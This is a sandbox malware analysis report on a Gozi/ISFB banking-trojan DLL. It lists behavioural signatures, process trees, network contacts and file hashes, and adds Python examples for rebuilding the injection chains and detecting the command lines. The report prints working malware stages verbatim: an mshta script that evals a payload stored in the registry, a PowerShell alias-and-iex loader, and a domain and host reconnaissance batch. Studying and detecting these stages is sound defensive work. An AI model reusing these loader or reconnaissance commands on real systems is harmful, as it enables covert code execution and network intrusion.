Analysis Overview
SHA256
7dae6d6fb339b6114ffdd3c0b6bcaa2c9dab0a73979fec029801e9e16d7d06bc
Threat Level: Known bad
The file de00c4750accf516704b8c0df265c24a was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi ISFB
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Enumerates processes with tasklist
Runs net.exe
Suspicious use of FindShellTrayWindow
Gathers system information
Suspicious behavior: MapViewOfSection
Discovers systems in the same network
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-03 17:54
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-03 17:54
Reported
2022-08-03 17:56
Platform
win7-20220715-en
Max time kernel
44s
Max time network
48s
Command Line
Signatures
Gozi, Gozi ISFB
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1432 wrote to memory of 1532 (7 identical events) | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
Network
Files
memory/1432-54-0x000007FEFBE91000-0x000007FEFBE93000-memory.dmp
memory/1532-55-0x0000000000000000-mapping.dmp
memory/1532-56-0x0000000076031000-0x0000000076033000-memory.dmp
memory/1532-57-0x0000000010000000-0x000000001000E000-memory.dmp
memory/1532-62-0x0000000000490000-0x000000000049D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-08-03 17:54
Reported
2022-08-03 17:56
Platform
win10v2004-20220721-en
Max time kernel
150s
Max time network
153s
Command Line
Signatures
Gozi, Gozi ISFB
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 368 set thread context of 2228 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 2228 set thread context of 3408 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2228 set thread context of 3608 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2228 set thread context of 3144 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2228 set thread context of 4356 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2228 set thread context of 4112 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
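The SetThreadContext rows above, like the WriteProcessMemory rows from the win7 run, are flat per-call records; the next analyst step is to rebuild the injection tree from them and to separate real injection (powershell.exe into Explorer.EXE, Explorer.EXE into RuntimeBroker.exe and cmd.exe) from the expected parent-to-child write that CreateProcess performs when 64-bit regsvr32 relaunches its SysWOW64 copy for a 32-bit DLL. The Python below is an added example and not part of the sandbox report; its rows are transcribed from the two signature tables on this page, and the list of script-host images and the rule that explorer.exe should never modify another process are the author's assumptions, not sandbox logic.

```python
import re
from collections import defaultdict

# Rows constructed from the signature tables in this report: the win7 WriteProcessMemory row
# and the win10 SetThreadContext rows. Format: (description, injecting image, target image).
ROW = re.compile(r"PID (\d+) (set thread context of|wrote to memory of) (\d+)")
SIGNATURE_ROWS = [
    ("PID 1432 wrote to memory of 1532", r"C:\Windows\system32\regsvr32.exe", r"C:\Windows\SysWOW64\regsvr32.exe"),
    ("PID 368 set thread context of 2228", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\Explorer.EXE"),
    ("PID 2228 set thread context of 3408", r"C:\Windows\Explorer.EXE", r"C:\Windows\System32\RuntimeBroker.exe"),
    ("PID 2228 set thread context of 3608", r"C:\Windows\Explorer.EXE", r"C:\Windows\System32\RuntimeBroker.exe"),
    ("PID 2228 set thread context of 3144", r"C:\Windows\Explorer.EXE", r"C:\Windows\System32\RuntimeBroker.exe"),
    ("PID 2228 set thread context of 4356", r"C:\Windows\Explorer.EXE", r"C:\Windows\System32\RuntimeBroker.exe"),
    ("PID 2228 set thread context of 4112", r"C:\Windows\Explorer.EXE", r"C:\Windows\syswow64\cmd.exe"),
]

# Assumption: sources that have no business touching another process's memory or thread context.
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
SHELL = {"explorer.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def build_graph(rows):
    """Return ({pid: image}, {injector_pid: [(target_pid, op), ...]})."""
    images, edges = {}, defaultdict(list)
    for desc, src_img, dst_img in rows:
        m = ROW.match(desc)
        if not m:
            continue
        src, op, dst = int(m.group(1)), m.group(2), int(m.group(3))
        images[src], images[dst] = basename(src_img), basename(dst_img)
        edges[src].append((dst, op))
    return images, dict(edges)


def injection_chains(rows):
    """Every path from a root injector (a PID that is never itself a target) down to a leaf."""
    images, edges = build_graph(rows)
    targets = {dst for outs in edges.values() for dst, _ in outs}
    chains = []

    def walk(pid, path):
        path = path + [f"{images[pid]}({pid})"]
        if pid not in edges:
            chains.append(path)
            return
        for dst, _ in edges[pid]:
            walk(dst, path)

    for root in (p for p in edges if p not in targets):
        walk(root, [])
    return chains


def anomalous_edges(rows):
    """Edges worth an alert, with the benign x64->WOW64 relaunch write filtered out."""
    images, edges = build_graph(rows)
    alerts = []
    for src, outs in edges.items():
        for dst, op in outs:
            s, d = images[src], images[dst]
            # CreateProcess writes the child's process parameters into the new address space,
            # so a parent writing into a same-named child (64-bit regsvr32 starting the
            # SysWOW64 copy for a 32-bit DLL) is expected and is not injection on its own.
            if op == "wrote to memory of" and s == d:
                continue
            if s in SCRIPT_HOSTS:
                alerts.append((s, src, op, d, dst, "script host modifying another process"))
            elif s in SHELL:
                alerts.append((s, src, op, d, dst, "shell modifying another process"))
    return alerts


if __name__ == "__main__":
    for chain in injection_chains(SIGNATURE_ROWS):
        print(" -> ".join(chain))
    for alert in anomalous_edges(SIGNATURE_ROWS):
        print("ALERT", alert)
```

On this report the chains come out as regsvr32.exe(1432) -> regsvr32.exe(1532) and five paths of the form powershell.exe(368) -> explorer.exe(2228) -> target; only the six edges below explorer.exe and the powershell.exe edge into it are alerted, which matches what the win7 run shows (no injection beyond the WOW64 relaunch) versus the win10 run (the Gozi/ISFB explorer.exe pivot).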
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 (SeIncreaseWorkingSetPrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 (SeTimeZonePrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 (SeCreateSymbolicLinkPrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 (SeDelegateSessionUserImpersonatePrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 (SeIncreaseWorkingSetPrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 (SeTimeZonePrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 (SeCreateSymbolicLinkPrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 (SeDelegateSessionUserImpersonatePrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Fvgb='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Fvgb).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EE2128B7-7580-5017-6F02-79841356BDF8\\\ChipUrls'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxgwsyrt -value gp; new-alias -name mjbjtinden -value iex; mjbjtinden ([System.Text.Encoding]::ASCII.GetString((rxgwsyrt "HKCU:Software\AppDataLow\Software\Microsoft\EE2128B7-7580-5017-6F02-79841356BDF8").BlackVirtual))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tjqwukuz\tjqwukuz.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFAD0.tmp" "c:\Users\Admin\AppData\Local\Temp\tjqwukuz\CSCC10E6909227340609AFC522872CD7CB3.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\evo4kxhq\evo4kxhq.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB9B.tmp" "c:\Users\Admin\AppData\Local\Temp\evo4kxhq\CSCAD08408EB8DB4D1EA4C66DC9C3D7502F.TMP"
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
C:\Windows\system32\more.com
more
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\net.exe
net config workstation
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\net.exe
net view /all /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\net.exe
net view /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\C84E.bin1 > C:\Users\Admin\AppData\Local\Temp\C84E.bin & del C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
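The cmd.exe lines above are the ISFB host-survey batch: each discovery tool appends to one staging file in %TEMP%, and the last command copies it to the final name and deletes the staging file. Together with the regsvr32 /s load from %TEMP%, the mshta about:<hta:application> stub that reads its payload from HKCU\Software\AppDataLow, and the PowerShell new-alias/iex stage, that gives four command-line patterns worth a rule. The Python below is an added detection example, not part of the sandbox report; it runs over a constructed list of (image, command line) pairs transcribed from the process list above plus two benign control lines, and the rule names, the MIN_TOOLS threshold of 4 and the discovery-tool list are the author's choices.

```python
import re
from collections import defaultdict

TEMP = r"C:\Users\Admin\AppData\Local\Temp"
OUT = TEMP + r"\C84E.bin1"

# Constructed sample: (image path, command line) transcribed from the behavioral2 process
# list, plus two benign controls. Real input would be Sysmon EID 1 / EDR process events.
SAMPLE_EVENTS = [
    (r"C:\Windows\system32\regsvr32.exe", f"regsvr32 /s {TEMP}\\de00c4750accf516704b8c0df265c24a.dll"),
    (r"C:\Windows\System32\mshta.exe", r'''"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Fvgb='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Fvgb).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EE2128B7-7580-5017-6F02-79841356BDF8\\\ChipUrls'));if(!window.flag)close()</script>"'''),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxgwsyrt -value gp; new-alias -name mjbjtinden -value iex; mjbjtinden ([System.Text.Encoding]::ASCII.GetString((rxgwsyrt "HKCU:Software\AppDataLow\Software\Microsoft\EE2128B7-7580-5017-6F02-79841356BDF8").BlackVirtual))'''),
    (r"C:\Windows\system32\cmd.exe", f'cmd /C "wmic computersystem get domain |more > {OUT}"'),
    (r"C:\Windows\system32\cmd.exe", f'cmd /C "systeminfo.exe > {OUT}"'),
    (r"C:\Windows\system32\cmd.exe", f'cmd /C "net view >> {OUT}"'),
    (r"C:\Windows\system32\cmd.exe", f'cmd /C "nslookup 127.0.0.1 >> {OUT}"'),
    (r"C:\Windows\system32\cmd.exe", f'cmd /C "tasklist.exe /SVC >> {OUT}"'),
    (r"C:\Windows\system32\cmd.exe", f'cmd /C "driverquery.exe >> {OUT}"'),
    (r"C:\Windows\system32\cmd.exe", f'cmd /C "reg.exe query "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" /s >> {OUT}"'),
    (r"C:\Windows\system32\cmd.exe", f'cmd /C "net config workstation >> {OUT}"'),
    (r"C:\Windows\system32\cmd.exe", f'cmd /C "nltest /domain_trusts /all_trusts >> {OUT}"'),
    (r"C:\Windows\system32\cmd.exe", f'cmd /U /C "type {OUT} > {TEMP}\\C84E.bin & del {OUT}"'),
    # Benign controls (constructed): an interactive inventory dump, and a lone "net view" into Temp.
    (r"C:\Windows\system32\cmd.exe", r'cmd /C "systeminfo.exe > C:\Users\Admin\Desktop\inventory.txt"'),
    (r"C:\Windows\system32\cmd.exe", f'cmd /C "net view >> {TEMP}\\shares.txt"'),
]

# Discovery tools seen in this batch; one entry per tool so repeats (net view /all) count once.
DISCOVERY = {
    "systeminfo": re.compile(r"\bsysteminfo(\.exe)?\b", re.I),
    "net view": re.compile(r"\bnet1?(\.exe)?\s+view\b", re.I),
    "net config": re.compile(r"\bnet1?(\.exe)?\s+config\s+workstation\b", re.I),
    "nltest": re.compile(r"\bnltest(\.exe)?\s+/domain_trusts\b", re.I),
    "tasklist": re.compile(r"\btasklist(\.exe)?\b", re.I),
    "driverquery": re.compile(r"\bdriverquery(\.exe)?\b", re.I),
    "reg query uninstall": re.compile(r"\breg(\.exe)?\s+query\s+\"?HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", re.I),
    "wmic domain": re.compile(r"\bwmic(\.exe)?\s+computersystem\s+get\s+domain\b", re.I),
    "nslookup": re.compile(r"\bnslookup(\.exe)?\b", re.I),
}
REDIRECT = re.compile(r">{1,2}\s*\"?([^\s\"&|]+)")
# "type <staging> > <final> & del <staging>": the same path appears as type operand and del operand.
CONSOLIDATE = re.compile(r"\btype\s+(\S+)\s*>\s*\S+\s*&\s*del\s+\1\b", re.I)
MIN_TOOLS = 4  # assumption: distinct discovery tools feeding one Temp file before alerting


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def temp_redirect_target(cmd):
    """Redirect target if the command writes into the user's Temp directory, else None."""
    m = REDIRECT.search(cmd)
    if not m:
        return None
    target = m.group(1).lower()
    return target if ("\\appdata\\local\\temp\\" in target or target.startswith("%temp%")) else None


def scan(events):
    """Return {rule: [evidence, ...]} for the loader, stager and recon patterns in this report."""
    findings = defaultdict(list)
    batches = defaultdict(dict)  # temp file -> {tool: command line}
    for image, cmd in events:
        img, low = basename(image), cmd.lower()
        if img == "regsvr32.exe" and re.search(r"\s/s\s", cmd) and re.search(r"\\appdata\\local\\temp\\[^\s\"]+\.dll", low):
            findings["regsvr32_temp_dll"].append(cmd)
        if img == "mshta.exe" and "about:<hta:application>" in low and "regread(" in low and "appdatalow" in low:
            findings["mshta_registry_stager"].append(cmd)
        if img == "powershell.exe" and re.search(r"new-alias\s+-name\s+\S+\s+-value\s+iex\b", low) and "appdatalow" in low:
            findings["powershell_alias_iex_registry"].append(cmd)
        if img == "cmd.exe":
            target = temp_redirect_target(cmd)
            if target:
                for tool, pat in DISCOVERY.items():
                    if pat.search(cmd):
                        batches[target][tool] = cmd
            if CONSOLIDATE.search(cmd):
                findings["recon_output_consolidated"].append(cmd)
    for target, tools in batches.items():
        if len(tools) >= MIN_TOOLS:
            findings["recon_batch_to_single_file"].append((target, sorted(tools)))
    return dict(findings)


if __name__ == "__main__":
    for rule, evidence in scan(SAMPLE_EVENTS).items():
        print(rule, evidence)
```

The batch rule keys on the redirect target rather than on any single tool, because each tool on its own (systeminfo, net view, nltest) is routine admin activity; nine distinct discovery tools writing to one file under %TEMP% inside a sandbox run is not. The consolidation rule fires only when the path given to type is the same one handed to del, which is the tell of a staging file being renamed and wiped.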
Network
| Country | Destination | Domain | Proto |
| US | 13.107.42.16:80 | config.edge.skype.com | tcp |
| RO | 37.120.206.71:80 | 37.120.206.71 | tcp |
| RU | 5.42.199.72:80 | 5.42.199.72 | tcp |
| RO | 37.120.206.91:80 | 37.120.206.91 | tcp |
| IE | 20.190.159.23:443 | N/A | tcp |
| DE | 185.212.47.98:8080 | N/A | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
| NL | 13.69.109.131:443 | N/A | tcp |
Files
memory/3396-130-0x0000000000000000-mapping.dmp
memory/3396-131-0x0000000010000000-0x000000001000E000-memory.dmp
memory/3396-136-0x00000000024B0000-0x00000000024BD000-memory.dmp
memory/368-140-0x0000000000000000-mapping.dmp
memory/368-141-0x000002B7F1AE0000-0x000002B7F1B02000-memory.dmp
memory/368-142-0x00007FFFDE2C0000-0x00007FFFDED81000-memory.dmp
memory/4084-143-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\tjqwukuz\tjqwukuz.cmdline
| MD5 | 6e643d9fe9f1aac860a49e946a8c1232 |
| SHA1 | c7d2d4618b3995fe915769ad5af4db5f16e20b49 |
| SHA256 | b576b3445b689a1f91fd59405021e742167b6d8b89b57e23f06c1191b2ebca4f |
| SHA512 | 0a620b6ea4ff2ea42849ce5faf70d0178acd87acad39fddfe5ea025374897ad72ab732e1b6e4cd01e7e70ce7d0cccdd32fb5d177a5659c356314ffa10b4936d1 |
\??\c:\Users\Admin\AppData\Local\Temp\tjqwukuz\tjqwukuz.0.cs
| MD5 | 9a10482acb9e6952b96f4efc24d9d783 |
| SHA1 | 5cfc9bf668351df25fcda98c3c2d0bb056c026c3 |
| SHA256 | a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377 |
| SHA512 | e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28 |
memory/1064-146-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\tjqwukuz\CSCC10E6909227340609AFC522872CD7CB3.TMP
| MD5 | 42ef9a91f67553f563161947d535ef3b |
| SHA1 | aaea4d23d8ef75b0375b71dbb44e802073930522 |
| SHA256 | 5b15566fc0f44fd1340273791069e308e09966dd9f90d85a4059bff524380d74 |
| SHA512 | c63eb24bae1149a90b4e4d7c82e3e1d8b92407ffd34970aca08f02a8870b63ea5654390894d9a96d60da565534c5d69f5de9bc1b4e1a1e644ddd7167d2d84eb8 |
C:\Users\Admin\AppData\Local\Temp\RESFAD0.tmp
| MD5 | 2bba2d3a3f5eceaf9fd5982bb1f4ffcd |
| SHA1 | 2069afb8433594dea4bed313bca99e13a936ff86 |
| SHA256 | e5e40879b657dc1a235ab7e907e4e500745b973e7bd411d0da7fd66469dcf473 |
| SHA512 | 6e1bc08b6776cd917f7e0507c6aa9d05e1db5e68ecdcc15a331963bbe243b1d0a6766cde21de0dbc279b261d66db8d434005dabe7df2ada7c689c60fff31e18e |
C:\Users\Admin\AppData\Local\Temp\tjqwukuz\tjqwukuz.dll
| MD5 | 81b10bf3c350962d2233c36f83b9b5cc |
